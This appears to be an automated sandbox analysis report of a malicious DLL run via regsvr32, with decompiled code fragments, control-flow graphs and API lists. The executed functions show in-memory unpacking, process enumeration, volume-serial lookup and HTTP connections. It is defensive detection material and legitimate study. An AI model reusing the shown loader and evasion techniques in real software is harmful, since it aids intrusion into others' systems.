                                                                                                                      0x61a021d3

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: signal
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946981877-0
                                                                                                                      • Opcode ID: ad4d076e22d9520d9b93fcca9e6a71dcf6c37439578361982c44f9de1996295d
                                                                                                                      • Instruction ID: 12a5e715142ebe7f0ef8d9f8116126114ad613ef9c327e39e2fe581930854a35
                                                                                                                      • Opcode Fuzzy Hash: ad4d076e22d9520d9b93fcca9e6a71dcf6c37439578361982c44f9de1996295d
                                                                                                                      • Instruction Fuzzy Hash: 282183607113024BFB154DF4B69537A5542AB8D39FF1DCC37CA29CA2A5FE2CC8D84226
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A02BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E61A02BD0(struct HINSTANCE__* __eax, void* __rcx) {
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t9;
				signed char* _t10;
				signed char* _t11;
				signed int _t12;
				signed int _t13;
				signed int _t14;
				signed int _t15;
				signed int _t16;
				signed int _t17;
				signed char* _t20;
				void* _t21;
				void* _t24;
				void* _t25;

				_t21 = __rcx;
				_t7 = __eax;
				_t20 =  *0x61a08950;
				if(_t20 == 0) {
					_t11 = 0;
					__eflags = 0;
					while(1) {
						_t1 = _t21 + 1; // 0x2
						_t10 = _t1;
						E61A02B40(_t11, __eflags, _t24, _t25);
						__eflags = _t20;
						if(_t20 == 0) {
							break;
						}
						_t12 =  *_t20 & 0x000000ff;
						__eflags = _t12 - 0x4d;
						if(_t12 != 0x4d) {
							__eflags = _t12 - 0x6d;
							if(__eflags != 0) {
								L18:
								_t11 = _t10;
								continue;
							}
						}
						_t13 = _t20[1] & 0x000000ff;
						__eflags = _t13 - 0x53;
						if(_t13 != 0x53) {
							__eflags = _t13 - 0x73;
							if(__eflags != 0) {
								goto L18;
							}
						}
						_t14 = _t20[2] & 0x000000ff;
						__eflags = _t14 - 0x56;
						if(_t14 != 0x56) {
							__eflags = _t14 - 0x76;
							if(__eflags != 0) {
								goto L18;
							}
						}
						_t15 = _t20[3] & 0x000000ff;
						__eflags = _t15 - 0x43;
						if(_t15 != 0x43) {
							__eflags = _t15 - 0x63;
							if(__eflags != 0) {
								goto L18;
							}
						}
						_t16 = _t20[4] & 0x000000ff;
						__eflags = _t16 - 0x52;
						if(_t16 != 0x52) {
							__eflags = _t16 - 0x72;
							if(__eflags != 0) {
								goto L18;
							}
						}
						_t17 = _t20[5] & 0x000000ff;
						__eflags = _t17 - 0x54;
						if(_t17 != 0x54) {
							__eflags = _t17 - 0x74;
							if(_t17 != 0x74) {
								__eflags = _t17 - 0x30 - 9;
								if(__eflags > 0) {
									goto L18;
								}
							}
						}
						_t7 = GetModuleHandleA();
						__eflags = _t20;
						 *0x61a08950 = _t20;
						if(_t20 == 0) {
							break;
						}
						goto L1;
					}
					_t9 = LoadLibraryW();
					 *0x61a08950 = _t20;
					return _t9;
				}
				L1:
				return _t7;
			}

















                                                                                                                      0x61a02bd0
                                                                                                                      0x61a02bd0
                                                                                                                      0x61a02bd5
                                                                                                                      0x61a02bdf
                                                                                                                      0x61a02bf0
                                                                                                                      0x61a02bf0
                                                                                                                      0x61a02bf2
                                                                                                                      0x61a02bf2
                                                                                                                      0x61a02bf2
                                                                                                                      0x61a02bf5
                                                                                                                      0x61a02bfa
                                                                                                                      0x61a02bfd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c03
                                                                                                                      0x61a02c06
                                                                                                                      0x61a02c09
                                                                                                                      0x61a02c0b
                                                                                                                      0x61a02c0e
                                                                                                                      0x61a02c60
                                                                                                                      0x61a02c60
                                                                                                                      0x00000000
                                                                                                                      0x61a02c60
                                                                                                                      0x61a02c0e
                                                                                                                      0x61a02c10
                                                                                                                      0x61a02c14
                                                                                                                      0x61a02c17
                                                                                                                      0x61a02c19
                                                                                                                      0x61a02c1c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c1c
                                                                                                                      0x61a02c1e
                                                                                                                      0x61a02c22
                                                                                                                      0x61a02c25
                                                                                                                      0x61a02c27
                                                                                                                      0x61a02c2a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c2a
                                                                                                                      0x61a02c2c
                                                                                                                      0x61a02c30
                                                                                                                      0x61a02c33
                                                                                                                      0x61a02c35
                                                                                                                      0x61a02c38
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c38
                                                                                                                      0x61a02c3a
                                                                                                                      0x61a02c3e
                                                                                                                      0x61a02c41
                                                                                                                      0x61a02c43
                                                                                                                      0x61a02c46
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c46
                                                                                                                      0x61a02c48
                                                                                                                      0x61a02c4c
                                                                                                                      0x61a02c4f
                                                                                                                      0x61a02c51
                                                                                                                      0x61a02c54
                                                                                                                      0x61a02c59
                                                                                                                      0x61a02c5c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c5c
                                                                                                                      0x61a02c54
                                                                                                                      0x61a02c67
                                                                                                                      0x61a02c6d
                                                                                                                      0x61a02c70
                                                                                                                      0x61a02c77
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02c77
                                                                                                                      0x61a02c87
                                                                                                                      0x61a02c8d
                                                                                                                      0x00000000
                                                                                                                      0x61a02c8d
                                                                                                                      0x61a02be6
                                                                                                                      0x61a02be6

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLibraryLoadModule
                                                                                                                      • String ID: msvcrt.dll
                                                                                                                      • API String ID: 4133054770-370904613
                                                                                                                      • Opcode ID: cac53002641ed9b36dc8c2274fc0e14ee9fd8e03f4652d6524ad28c7d79c03ba
                                                                                                                      • Instruction ID: 904f072dd3d647ee3c979ebf84911096cdee9d0a1ea8e72725f404ad71c272ab
                                                                                                                      • Opcode Fuzzy Hash: cac53002641ed9b36dc8c2274fc0e14ee9fd8e03f4652d6524ad28c7d79c03ba
                                                                                                                      • Instruction Fuzzy Hash: B511602190ABA844FB150FF0F4A63B52BA7A746B0FF8CC417C558023A2D73F46D8D612
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A02770 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4020351045-0
                                                                                                                      • Opcode ID: 293f624c5436ae6df14e00fcfa5132dff7623d6b167e20e042ba9a14ae1f671b
                                                                                                                      • Instruction ID: 20c34a197cd119b53df487b0ffefe401a269d4602c0ab3785e733735b930c435
                                                                                                                      • Opcode Fuzzy Hash: 293f624c5436ae6df14e00fcfa5132dff7623d6b167e20e042ba9a14ae1f671b
                                                                                                                      • Instruction Fuzzy Hash: D7014875717B0486EA09DFE5F89039923A2B78CB8AF5C8426C90887320DB79C4A59716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:19.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:57
                                                                                                                      Total number of Limit Nodes:8
                                                                                                                      execution_graph 3524 120000 3525 120183 3524->3525 3526 12043e VirtualAlloc 3525->3526 3530 120462 3526->3530 3527 120a00 3528 120531 GetNativeSystemInfo 3528->3527 3529 12056d VirtualAlloc 3528->3529 3531 12058b 3529->3531 3530->3527 3530->3528 3531->3527 3532 1209d9 VirtualProtect 3531->3532 3532->3531 3533 180014674 3536 180020760 3533->3536 3537 180020791 3536->3537 3538 1800146f0 3537->3538 3539 180020a5e Process32FirstW 3537->3539 3539->3537 3540 180004ed0 3543 180009488 3540->3543 3542 180004f3a 3549 1800094ec 3543->3549 3547 18000acb7 3547->3542 3549->3547 3551 180015f90 3549->3551 3555 18001bad8 3549->3555 3559 180022ff4 3549->3559 3563 18000bfc8 3549->3563 3567 18001ec00 3549->3567 3552 180015fed 3551->3552 3553 180016a57 3552->3553 3571 18001c5b4 3552->3571 3553->3549 3556 18001bafd 3555->3556 3558 18001bc14 3556->3558 3582 180023b54 3556->3582 3558->3549 3560 18002302d 3559->3560 3561 180023059 3560->3561 3593 180014674 3560->3593 3561->3549 3566 18000bff0 3563->3566 3564 18000c1ac 3564->3549 3565 180014674 Process32FirstW 3565->3566 3566->3564 3566->3565 3568 18001ec4a 3567->3568 3569 18001efa9 3568->3569 3570 180014674 Process32FirstW 3568->3570 3569->3549 3570->3568 3574 18001c63b 3571->3574 3573 18001d434 3573->3552 3574->3573 3576 180014840 3574->3576 3579 18001b94c 3574->3579 3578 1800148da 3576->3578 3577 1800149af HttpOpenRequestW 3577->3574 3578->3577 3581 18001b9d5 3579->3581 3580 18001baa3 InternetConnectW 3580->3574 3581->3580 3583 180023b73 3582->3583 3585 180023c19 3583->3585 3586 18000ca8c 3583->3586 3585->3556 3588 18000cbbd 3586->3588 3587 18000cdba 3587->3585 3588->3587 3590 180011f70 3588->3590 3592 180011ff0 3590->3592 3591 1800120e6 GetVolumeInformationW 3591->3587 3592->3591 3594 180020760 Process32FirstW 3593->3594 3595 1800146f0 3594->3595 3595->3560

                                                                                                                      Executed Functions

                                                                                                                      Function 00120000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 120000-120460 call 120aa8 * 2 VirtualAlloc 22 120462-120466 0->22 23 12048a-120494 0->23 24 120468-120488 22->24 26 120a91-120aa6 23->26 27 12049a-12049e 23->27 24->23 24->24 27->26 28 1204a4-1204a8 27->28 28->26 29 1204ae-1204b2 28->29 29->26 30 1204b8-1204bf 29->30 30->26 31 1204c5-1204d2 30->31 31->26 32 1204d8-1204e1 31->32 32->26 33 1204e7-1204f4 32->33 33->26 34 1204fa-120507 33->34 35 120531-120567 GetNativeSystemInfo 34->35 36 120509-120511 34->36 35->26 38 12056d-120589 VirtualAlloc 35->38 37 120513-120518 36->37 39 120521 37->39 40 12051a-12051f 37->40 41 1205a0-1205ac 38->41 42 12058b-12059e 38->42 43 120523-12052f 39->43 40->43 44 1205af-1205b2 41->44 42->41 43->35 43->37 46 1205c1-1205db 44->46 47 1205b4-1205bf 44->47 48 12061b-120622 46->48 49 1205dd-1205e2 46->49 47->44 51 1206db-1206e2 48->51 52 120628-12062f 48->52 50 1205e4-1205ea 49->50 53 12060b-120619 50->53 54 1205ec-120609 50->54 56 120864-12086b 51->56 57 1206e8-1206f9 51->57 52->51 55 120635-120642 52->55 53->48 53->50 54->53 54->54 55->51 60 120648-12064f 55->60 58 120871-12087f 56->58 59 120917-120929 56->59 61 120702-120705 57->61 64 12090e-120911 58->64 62 120a07-120a1a 59->62 63 12092f-120937 59->63 65 120654-120658 60->65 66 120707-12070a 61->66 67 1206fb-1206ff 61->67 90 120a40-120a4a 62->90 91 120a1c-120a27 62->91 69 12093b-12093f 63->69 64->59 68 120884-1208a9 64->68 70 1206c0-1206ca 65->70 71 120788-12078e 66->71 72 12070c-12071d 66->72 67->61 95 120907-12090c 68->95 96 1208ab-1208b1 68->96 75 120945-12095a 69->75 76 1209ec-1209fa 69->76 73 12065a-120669 70->73 74 1206cc-1206d2 70->74 77 120794-1207a2 71->77 72->77 78 12071f-120720 72->78 86 12067a-12067e 73->86 87 12066b-120678 73->87 74->65 82 1206d4-1206d5 74->82 84 12097b-12097d 75->84 85 12095c-12095e 75->85 76->69 88 120a00-120a01 76->88 80 1207a8 77->80 81 12085d-12085e 77->81 89 120722-120784 78->89 92 1207ae-1207d4 80->92 81->56 82->51 100 1209a2-1209a4 84->100 101 12097f-120981 84->101 97 120960-12096c 85->97 98 12096e-120979 85->98 102 120680-12068a 86->102 103 12068c-120690 86->103 99 1206bd-1206be 87->99 88->62 89->89 104 120786 89->104 93 120a7b-120a8e 90->93 94 120a4c-120a54 90->94 105 120a38-120a3e 91->105 127 1207d6-1207d9 92->127 128 120835-120839 92->128 93->26 94->93 107 120a56-120a78 94->107 95->64 116 1208b3-1208b9 96->116 117 1208bb-1208c8 96->117 108 1209be-1209bf 97->108 98->108 99->70 114 1209a6-1209aa 100->114 115 1209ac-1209bb 100->115 109 120983-120987 101->109 110 120989-12098b 101->110 111 1206b6-1206ba 102->111 112 120692-1206a3 103->112 113 1206a5-1206a9 103->113 104->77 105->90 106 120a29-120a35 105->106 106->105 107->93 122 1209c5-1209cb 108->122 109->108 110->100 120 12098d-12098f 110->120 111->99 112->111 113->99 121 1206ab-1206b3 113->121 114->108 115->108 123 1208ea-1208fe 116->123 124 1208d3-1208e5 117->124 125 1208ca-1208d1 117->125 129 120991-120997 120->129 130 120999-1209a0 120->130 121->111 131 1209d9-1209e9 VirtualProtect 122->131 132 1209cd-1209d3 122->132 123->95 138 120900-120905 123->138 124->123 125->124 125->125 133 1207e3-1207f0 127->133 134 1207db-1207e1 127->134 135 120844-120850 128->135 136 12083b 128->136 129->108 130->122 131->76 132->131 140 1207f2-1207f9 133->140 141 1207fb-12080d 133->141 139 120812-12082c 134->139 135->92 142 120856-120857 135->142 136->135 138->96 139->128 144 12082e-120833 139->144 140->140 140->141 141->139 142->81 144->127
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1196878125.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_120000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                      • API String ID: 2313188843-2517549848
                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction ID: 293b7fc70191dd252ce7d09db3203158210f4751d35e9feb459d5409d4c5e630
                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction Fuzzy Hash: 6F72D430618B488FDB19DF18D8856BAB7E1FB98305F10462DE8CBD7212DB34D996CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180005610 Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 645 180005610-180005662 646 180005664-180005669 645->646 647 18000595a 646->647 648 18000566f-180005674 646->648 649 18000595f-180005964 647->649 650 1800058f1-180005951 call 18000da94 648->650 651 18000567a-18000567f 648->651 649->646 652 18000596a-18000596d 649->652 650->652 659 180005953-180005958 650->659 651->649 654 180005685-1800056f0 call 18001c270 651->654 656 18000596f-18000597e 652->656 657 180005980-1800059fc call 180019acc 652->657 660 1800056f5-1800056fa 654->660 661 1800059fe-180005a15 656->661 657->661 663 1800058e3-1800058ec 659->663 660->657 664 180005700-180005705 660->664 663->646 664->652 666 18000570b-180005710 664->666 666->663 667 180005716-18000578c call 18000da94 666->667 667->652 670 180005792-1800058dd call 180001eac call 180019acc 667->670 670->652 670->663
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X&$mo8$O~
                                                                                                                      • API String ID: 0-2010489101
                                                                                                                      • Opcode ID: c2347ea164830ed0d4a6c65f0050550166cd3a0037bb0a0ce5f91a08a33b34a7
                                                                                                                      • Instruction ID: 6a5313c3882841910a51942184fa071e55cd4ea5190554791fccfa72d789913c
                                                                                                                      • Opcode Fuzzy Hash: c2347ea164830ed0d4a6c65f0050550166cd3a0037bb0a0ce5f91a08a33b34a7
                                                                                                                      • Instruction Fuzzy Hash: BDC1277090479D8BCF58CFA8C88A6EE7BF1FB48354F10821DE846A7650D7B4D949CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000C3D8 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 713 18000c3d8-18000c43f call 18000488c 716 18000c444 713->716 717 18000c446-18000c44b 716->717 718 18000c451-18000c456 717->718 719 18000c742-18000c761 717->719 722 18000c45c-18000c461 718->722 723 18000c610-18000c73d call 1800138f0 call 18001378c call 180014770 718->723 720 18000c767-18000c76c 719->720 721 18000c9eb-18000c9f9 719->721 724 18000c78d-18000c790 720->724 725 18000c76e-18000c775 720->725 739 18000ca05-18000ca1a 721->739 740 18000c9fb-18000ca00 721->740 727 18000c467-18000c46c 722->727 728 18000ca2b-18000ca72 call 180008c04 722->728 723->716 732 18000c783-18000c788 724->732 734 18000c792-18000c96d call 18000901c call 180019530 call 18000c3d8 724->734 725->732 733 18000c777-18000c77b 725->733 729 18000c472-18000c477 727->729 730 18000c546-18000c5f4 call 180004cf8 727->730 744 18000ca77-18000ca89 728->744 737 18000c494-18000c519 call 1800220d8 729->737 738 18000c479-18000c47e 729->738 750 18000c5f9-18000c600 730->750 732->717 733->724 741 18000c77d-18000c781 733->741 761 18000c972-18000c9e6 call 180014770 734->761 754 18000c51e-18000c527 737->754 746 18000c484-18000c492 738->746 747 18000ca1f-18000ca24 738->747 739->747 749 18000c52c-18000c541 740->749 741->724 741->732 746->717 747->744 755 18000ca26 747->755 749->717 750->744 756 18000c606-18000c60b 750->756 754->749 755->717 756->749 761->732
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8Z$B.
                                                                                                                      • API String ID: 0-2527348568
                                                                                                                      • Opcode ID: cb07a6e61e180255bfc0c082a29cde48e0cd665697f501792ffa18a34e0636f7
                                                                                                                      • Instruction ID: 9aab12200af81379afa0b2d2d592fa5a7a58bce18c8a16dc476b58366764752b
                                                                                                                      • Opcode Fuzzy Hash: cb07a6e61e180255bfc0c082a29cde48e0cd665697f501792ffa18a34e0636f7
                                                                                                                      • Instruction Fuzzy Hash: BD02E4705087848FD798DFA8C59AA9EFBE1FB88744F10891DF48687260D7B8D949CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180011F70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationVolume
                                                                                                                      • String ID: T
                                                                                                                      • API String ID: 2039140958-1662524932
                                                                                                                      • Opcode ID: 0967d41a2eb9fb3d25ac9fb381e60b24cf89f7a4a19ed90094454917ee36c5c8
                                                                                                                      • Instruction ID: 77b95de10bfff641f67f2e2c26f2fa31c575b63fd0959aaf6b2e09c8fcee0d18
                                                                                                                      • Opcode Fuzzy Hash: 0967d41a2eb9fb3d25ac9fb381e60b24cf89f7a4a19ed90094454917ee36c5c8
                                                                                                                      • Instruction Fuzzy Hash: 7941F37061CB848FD7B4DF28D48678ABBE0FB88315F504A5EE88C87256DB749884CB47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001B94C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 706 18001b94c-18001b9f5 call 18000488c 709 18001baa3-18001bad6 InternetConnectW 706->709 710 18001b9fb-18001ba9d call 1800195d0 706->710 710->709
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectInternet
                                                                                                                      • String ID: G
                                                                                                                      • API String ID: 3050416762-985283518
                                                                                                                      • Opcode ID: dce47d9158bf90ac5c87e873f40270f5f0e313ae64c005fd65b5a0ec8f2786b1
                                                                                                                      • Instruction ID: 9773507c8870805c4c1585e8c723d8a5746d37486085fc99141f3b205cfa01f4
                                                                                                                      • Opcode Fuzzy Hash: dce47d9158bf90ac5c87e873f40270f5f0e313ae64c005fd65b5a0ec8f2786b1
                                                                                                                      • Instruction Fuzzy Hash: 3C41F7705187888FD3B4CF68D48979BFBE0FB89355F508A5EA08DC7261DB749484CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180014840 Relevance: 1.6, APIs: 1, Instructions: 102networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1984915467-0
                                                                                                                      • Opcode ID: ef3392a53f393c253ca7a8ed96990fe4d31faf9a6bddb93e23eb60e210117687
                                                                                                                      • Instruction ID: 035c47ef70bc0c2c70a3e7b3a92b0a383b56db56109828277292dcff0bcd7dd0
                                                                                                                      • Opcode Fuzzy Hash: ef3392a53f393c253ca7a8ed96990fe4d31faf9a6bddb93e23eb60e210117687
                                                                                                                      • Instruction Fuzzy Hash: 8B41E47051CB848FDBB4DF58D485B9AB7E0FB98304F104A5EE88CD7255CB749984CB86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%